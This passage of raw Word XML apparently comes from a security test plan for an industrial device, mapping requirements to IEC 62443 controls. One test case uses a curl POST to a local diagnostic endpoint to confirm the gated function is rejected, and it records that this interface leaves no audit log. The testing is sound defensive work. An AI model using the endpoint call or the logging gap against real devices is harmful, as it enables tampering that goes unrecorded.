        </w:rPr>
        <w:t>Level 1 - Abstract Test Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88A833" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7B0E02"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E0D816F" w14:textId="00A0C793"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sv-SE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-003 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> EDR 2.13 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="sv-SE"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset G, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27DEC45E" w14:textId="08D2575F" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A324864" w14:textId="270B968A" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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r w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B9564DD" w14:textId="120D3FFB" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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Validate the compensating exclusion of the development/diagnostic interface: confirm that the production-gated diagnostic function is rejected on a production unit, and that exercising the excluded interface generates no log entry, so an intervention at this interface leaves no evidence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4123E6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On a production-configured unit, attempt to invoke the production-gated diagnostic/test function.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1950688C" w14:textId="77777777" w:rsidR="003C06C9"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Confirm rejection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7418B2CD" w14:textId="3CC7749D" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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Inspect the audit log for any entry corresponding to the attempt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B43FF1C"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(exclusion valid) if the function is rejected on the production unit. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B5A2E2" w14:textId="77777777" w:rsidR="003C06C9"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Documented gap: the excluded interface produces no evidence, so RQ-003's "evidence of any intervention" is unmet at this interface. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F2AE7DC" w14:textId="1A9EA892" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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Limitation: a true hardware-fuse claim is not verifiable without invasive physical analysis and is out of scope; only the functional gate is tested.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="678225D4" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F214F4" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72A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6D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B0CF63" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C1D3C64" w14:textId="0159E8E1" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72A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TC-RQ003-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A778F69" w14:textId="7DA402BB" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00B93207"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w:t>
            </w:r>
            <w:r w:rsidR="00D22AC0" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>roduction-configured unit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C74894" w14:textId="6A0C8700" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="00D22AC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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="008E72AE" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F272AC" w14:textId="77777777" w:rsidR="00D22AC0"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FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attempt the production-gated FIT service on a production unit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEE08F7" w14:textId="565586B1" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>`curl -s -X POST http://</w:t>
            </w:r>
            <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>192.168.0.2</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>/fit/setfit -d '{"type":1}' -w "%{http_code}\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E72AE" w:rsidRPr="006D5B99"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EDD6654" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="004954E2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA7CCBE" w14:textId="77777777" w:rsidR="0052540B"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 xml:space="preserve">Expected: FIT rejected on the production unit (exclusion valid); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD48026" w14:textId="03E265DF" w:rsidR="008E72AE" w:rsidRPr="006D5B99"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the excluded interface produces no log entry (documented gap). Limitation: a true silicon fuse is not verifiable without invasive PA-4 analysis</w:t>
            </w:r>
            <w:r w:rsidR="0052540B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> only the functional gate is tested. Evidence: cm_rq003-05_fit.txt, error-log excerpt. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FF0293E" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6AFDD2" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52985A5F" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CFDCBB" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDEF5AC" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D83865A" w14:textId="77777777" w:rsidR="008E72AE" w:rsidRPr="006D5B99" w:rsidRDefault="008E72AE" w:rsidP="008E72AE">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AC10CF" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B28CB79" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7595DD23" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B28A4B" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5293B47E" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5915DE09" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4369DE04" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B5D10A" w14:textId="77777777" w:rsidR="00E10C53" w:rsidRPr="006D5B99" w:rsidRDefault="00E10C53" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AB9DBA" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3710874D" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5529C636" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC26573" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C58F3FB" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18445026" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594BD342" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5705F503" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEFBFBC" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B200B2" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4218DDE7" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD7779B" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0ED13F" w14:textId="77777777" w:rsidR="004D1842" w:rsidRPr="006D5B99" w:rsidRDefault="004D1842" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D255AA" w14:textId="77777777" w:rsidR="0052540B" w:rsidRPr="006D5B99" w:rsidRDefault="0052540B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D55076" w14:textId="77777777" w:rsidR="006669AB" w:rsidRPr="006D5B99" w:rsidRDefault="006669AB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1805C496" w14:textId="1DB00D08" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30536E2F"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BB6C3B0" w14:textId="15F24AEE" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="003F4DA5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DFCC4" w14:textId="3AEB44EE"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3F4DA5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The system shall identify the software and data that are critical for compliance with the essential health and safety requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556F67E" w14:textId="2C7E242C" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR </w:t>
      </w:r>
      <w:r w:rsidR="001D4045" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:r w:rsidR="004D1842" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 7.8</w:t>
      </w:r>
      <w:r w:rsidR="00B305C0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00B305C0" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
